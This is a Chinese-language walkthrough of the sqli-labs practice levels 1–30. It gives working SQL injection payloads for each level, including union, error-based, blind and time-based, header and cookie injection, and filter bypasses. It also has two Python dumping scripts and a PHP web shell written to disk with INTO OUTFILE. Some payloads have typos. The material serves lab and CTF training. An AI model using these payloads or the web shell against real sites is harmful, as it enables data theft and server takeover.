第一关('单引号注释)
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,database() ,3 -- - 爆库
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database()-- - 爆表
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name='users' and table_schema=database()-- - 爆字段
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(id,username,password) ,3 from security.users -- - 爆字段
第二关(数字型注入,无闭合符)
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3-- -
第三关(‘)绕过)
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,3-- -
第四关(")绕过)
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3-- -
第五关(二次查询'单引号floor报错注入最长64字符)
wp:尝试出现各种页面,发现没有回显,输入'发现报错,使用报错注入
刘子璇版(https://blog.csdn.net/qq_43573676/article/details/105774162)
?id=1' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆库
?id=1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆表
?id=1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆字段
?id=1' union select 1,count(*),concat(0x7e,(select password from users limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆密码
and (select 1 from (select count(),concat(( payload),floor (rand(0)2))x from
徐博文版
information_schema.tables group by x)a)语句的构建
?id=2' and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库
?id=2' and (select 1 from (select count(),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -当前数据库的表
?id=2' and (select 1 from (select count(),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 爆列名
15-17
?id=2' and (select 1 from (select count(),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -爆内容
相关知识
-
count():汇总数据函数
-
rand():随机输出一个小于1的正数
-
floor():把输出的结果取整
-
group by语句:把结果分组输出
-
concat():连接两条语句
- 十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)
- concat mysql sql注入_SQL注入之MySQL报错注入整理_weixin_39908758的博客-CSDN博客
-
脚本
import requests from bs4 import BeautifulSoup db_name = '' table_list = [] column_list = [] url = '''http://192.168.1.113:86/Less-5/?id=1'''
获取当前数据库名
print('当前数据库名:') payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)2)))--+''' r = requests.get(url+payload) db_name = r.text.split(':')[-2] print('[+]' + db_name)
获取表名
print('数据库%s下的表名:' % db_name) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (db_name,i) r = requests.get(url+payload) if 'group_key' not in r.text: break table_name = r.text.split(':')[-2] table_list.append(table_name) print('[+]' + table_name)
获取列名
这里以users表为例
print('%s表下的列名:' % table_list[-1]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break column_name = r.text.split(':')[-2] column_list.append(column_name) print('[+]' + column_name)
获取字段值
这里以username列为例
print('%s列下的字段值:' % column_list[-2]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)2)))--+''' % (column_list[-2],db_name,table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break dump = r.text.split(':')[-2] print('[+]' + dump)
第六关("双引号floor报错注入最长64字符)
?id=2” and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库
第七关('))out file存储)
Less-7/?id=-1’)) and 1=2 union slect 1,"<?php @eval($_POST['cmd']);?>",3 into outfile ‘outcome.php’–- - 文件默认在@@datadir显示的数据库的当前库的根目录下
?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\123456.php" -- - 也可以自定义路径,这里转义了\,需要\\来表示\
相关知识
1.mysql.ini中 添加secure_file_priv=""
secure_file_prive=null ––限制mysqld 不允许导入导出
secure_file_priv=/path/ – --限制mysqld的导入导出只能发生在默认的/path/目录下
secure_file_priv="" – --不对mysqld 的导入 导出做限制
2.因为第七关没有回显,所有利用第一关查看路径,和secure_file_priv情况
/Less-1/?id=-1’ union select 1,@@datadir,@@secure_file_priv-- -
@@datadir函数查看MySql存放数据文件的目录也就是,mysql的data目录路径
@@secure_file_priv函数查看权限
3.into outfile函数使用的前提是,已知一个拥有写入和执行权限的目录文件夹
4.into outfile 将查询结果写入文件里
5.MySQL中的basedir和datadir的作用
第八关(’单引号字符型注入,也可以布尔和时间盲注)
id=1'and ascii(substring(database(),1,1))=115--+
第九关('单引号睡眠注入)
尝试了下各种姿势发现都是一个回显,我们可以用睡眠注入
?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -
(编码(截取(当前数据库),从第一个字母开始,截取一个 ))如果成立立即显示,否则睡眠(转)5秒显示
sleep(if(length(database())=8,0,5))-- - 如果数据库长度=8,不睡,否则睡5秒。
if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(5),1) -- - a为尝试的数字,爆表名
?id=-1' union select 1,2,group_concat(concat_ws("-",username,password)) from users-- -
相关知识
-
concat_ws("指定分隔符,默认空格",连接的字段)
-
substr(被截取对象,从第几个开始,截取几个)
-
ascii表()
-
睡眠注入脚本
import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True: for i in table: ss = time.time() data = { 'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i), } #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['datebase']+")--+" 查找数据库 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['table']+")--+" 查表名 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['column']+")--+" 查字段名 url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['flag']+")--+" #查数据 t=requests.get(url)
if time.time()-ss>=4: flag += i print (flag)
第十关("双引号睡眠注入)
?id=1" and If(ascii(substr(database(),2,1))=101,1,sleep(5))-- -
第十一关(post'注入)
uname=0' union select 1,database()-- -&passwd=123&submit=Submit
第十二关(POST ")注入)
uname=123")union select 1,database()-- -&passwd=123&submit=Submit
第十三关(post')报错注入)
uname=123') union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- -&passwd=123')or 1-- -&submit=Submit 至于为什么不能') "-- -闭合运行我也不知道
第十四关(基于"的post"报错注入)
uname=123"union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- - &passwd=123"or 1-- -&submit=Submit
第十五关(基于‘的post‘布尔盲注)(dns注入)
uname=123' or (length(database())) = 8-- -&passwd=123'-- -&submit=Submit
第十六关(基于'的post")睡眠盲注)(dns注入)
1") and If(ascii(substr(database(),1,1))=115,sleep(5),1)#
第十七关(基于'的密码报错注入)
传入合法时,修改
admb’ or extractvalue(1,concat(0x7e,(select database())))#
uname=admin&passwd=1' and (select 1 from (select count(),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a) #
第十八关(基于'的post'User-Agent头注入)adminadmin登录
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93 'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第十九关(基于'的post'Referer头注入)adminadmin登录
Referer: http://127.0.0.1/sqli/Less-19/'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第二十关(基于'的post'cookie头报错注入)adminadmin登录
Cookie: uname=admin'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第二十一关(基于’)字符型的post'cookie头base64加密注入)adminadmin
')union select 1,2,database()-- -没成功
第二十二关(基于"的cookie编码base64注入)
uname=" union select 1,2,3# ;
Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLDMjIDs=
第二十三关(过滤注释的GET型注入)
id=-1' union select 1,2,3 ='1
第二十四关(二次注入)
知道admin用户存在但不知道密码
点击New User click here?注册admin'-- - 123456
登录admin 密码为123456
第二十五关(过滤or和and的单引号注入)
?id=-1' union select 1,2,3-- -
第二十六关(基于’过滤注释和空格的注入)
?id=-1'aandnd(updatexml(1,@@datadir,1))anandd'1'='1
第二十七关(基于’过滤union、select与注释和空格的注入)
?id=1'and(updatexml(1,@@datadir,1))and'1'='1
第二十八关(基于’)过滤union和select等的盲注)
id=111') UnIon All Select ('1'),2,('3 url编码
?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273
第二十九关(index.php——基于单引号字符型的注入)
index.php?id=-1' union select 1,2,3 -- -
login.php——基于单引号的参数污染绕过
login.php?id=1&id=-1' union select 1,2,3 -- -
第三十关(index.php——基于双引号字符型的注入)
?id=-1" union select 1,2,3 -- -
login.php——基于双引号的参数污染绕过
login.php?id=1&id=-1" union select 1,2,3 -- -
参考链接:mysql-injection.pdf
(16条消息) sqli-labs注入——sqli-labs的1-65关闯关指南_lacryma5555的博客-CSDN博客
Comments NOTHING